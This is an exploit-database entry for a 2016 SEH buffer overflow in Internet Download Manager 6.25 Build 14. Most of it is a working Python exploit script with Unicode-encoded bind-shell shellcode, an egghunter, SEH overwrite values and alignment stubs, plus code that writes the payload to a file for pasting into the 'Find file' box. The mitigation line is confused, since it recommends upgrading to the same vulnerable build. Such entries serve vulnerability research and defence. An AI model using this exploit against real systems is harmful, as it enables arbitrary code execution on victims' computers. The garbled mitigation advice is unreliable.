Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)

vendor:

Internet Download Manager

by:

Rakan Alotaibi

7,8

CVSS

HIGH

SEH Buffer Overflow

119

CWE

Product Name: Internet Download Manager

Affected Version From: 6.25 Build 14

Affected Version To: 6.25 Build 14

Patch Exists: YES

Related CWE: N/A

CPE: a:internet_download_manager:internet_download_manager:6.25

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 SP1 x86

2016

Internet Download Manager 6.25 Build 14 – ‘Find file’ SEH Buffer Overflow (Unicode)

Internet Download Manager 6.25 Build 14 is vulnerable to a SEH buffer overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted malicious payload to the 'Find file' textbox. This will cause a SEH overwrite and allow the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Internet Download Manager 6.25 Build 14.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)
# Date: 20-3-2016
# Exploit Author: Rakan Alotaibi
# Contact: https://twitter.com/hxteam
# Software Link: http://mirror2.internetdownloadmanager.com/idman625build14.exe
# Tested on: Windows 7 SP1 x86
# How to exploit: IDM > Downloads > Find > paste exploit string into 'Find file' textbox

tag = "AvAv"

# msfvenom -p windows/shell_bind_tcp lport=4444 -e x86/unicode_upper BufferRegister=EAX
shellcode = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J"
"BKL9XU2M0KPM0QP3YZENQ7PQTTKR0NPDKR2LLDKQBN44KSBMXLO7GOZO601KO6LO"
"LS1SLM2NLMP7Q8OLMKQY7IRZR1BQG4K22N04K0JOLDK0LN1SHJC0HM18Q0Q4K0YO"
"0KQ9CTKOYLX9SNZQ94KNTDKKQ8V01KOVLGQ8OLMKQY708K0D5KFLC3MKHOKCMNDD"
"5ZD0X4KB8O4M1IC2F4KLL0KTKPXMLKQICDKKTDKKQJ0SY0DO4NDQK1KS1QIPZ21K"
"OK01O1O1JDKMBZKTM1M2HP3OBKPKP1XT7SCNR1OB42H0LCGO6LGKOIEH860M1M0K"
"PMYXD1DPPQXMY3PBKKPKOHU2JKXR9R0IRKMQ0R0Q00PQXJJLO9OIPKOIE4WQXM2K"
"PN11L4IYVQZLPQFPWS8XBIKNW1WKOHU0WRHWG9YOHKOKO8U27BHD4ZLOKYQKOYE0"
"W671X2UBNPMS1KOYEBH2C2MRDM0TIIS27QG0WP1ZVBJLR29PVK2KM3697PDNDOLK"
"QM1TM14NDLPWVKP14QD0PQF26PVOV26PNQFR6QC26QXBYXLOO3VKO9E3YK00NB6O"
"VKOP0QXKX57MMC0KOZ5WKL0FUFBB6QX5V5E7MEMKOXUOLKV3LKZ3PKKIP45M57KP"
"GMCCB2OBJKPQCKO9EAA")

# Windows NtAccessCheckAndAuditAlarm EggHunter
# Size: 32 bytes
egghunter = (
"PPYAIAIAIAIAQATA"
"XAZAPA3QADAZABAR"
"ALAYAIAQAIAQAPA5"
"AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBA"
"BABABAB30APB944J"
"BQV51HJKOLOPBR2Q"
"ZKRPXXMNNOLKUPZ2"
"TJOWHKPOQKPT6DKJ"
"ZVOT5ZJVOBUK7KOK"
"7LJA")

buffersize = 6000
nseh = "\x61\x47" # popad + venetian pad
seh =  "\x8d\x51" # 0x0051008d: pop edi # pop esi # ret [IDMan.exe]
venalign = (
            "\x47" # venetian pad
            "\x55" # push ebp
            "\x47" # venetian pad
            "\x58" # pop eax
            "\x47" # venetian pad
            "\x05\x18\x11" # add eax,11001800
            "\x47" # venetian pad
            "\x2d\x17\x11" # sub eax,11001700
            "\x47" # venetian pad
            "\x50" # push eax
            "\x47" # venetian pad
            "\xc3" # ret
            )
            
venalign2 = (
            "\x43" # venetian pad
            "\x47" # inc edi
            "\x43" # venetian pad
            "\x57" # push edi
            "\x43" # venetian pad
            "\x58" # pop eax
            "\x43" # venetian pad
            "\x05\x18\x11" # add eax,11001800
            "\x43" # venetian pad
            "\x2d\x17\x11" # sub eax,11001700
            "\x43" # venetian pad
            "\x50" # push eax
            "\x43" # venetian pad
            "\xc3" # ret
            )

junk2 = "\x71" * 108
junk3 = "\x71" * 110
evil2 = tag +  venalign2 + junk3 + shellcode
junk = "\x42" * (2192-(len(evil2)))
evil =  junk + evil2 + nseh + seh + venalign + junk2 + egghunter
fill = "\x47" * (buffersize-len(evil))
buffer = evil + fill

filename = "exploit.txt"
file = open(filename, 'w')
file.write(buffer)
file.close()
print buffer
print "[+] File created successfully"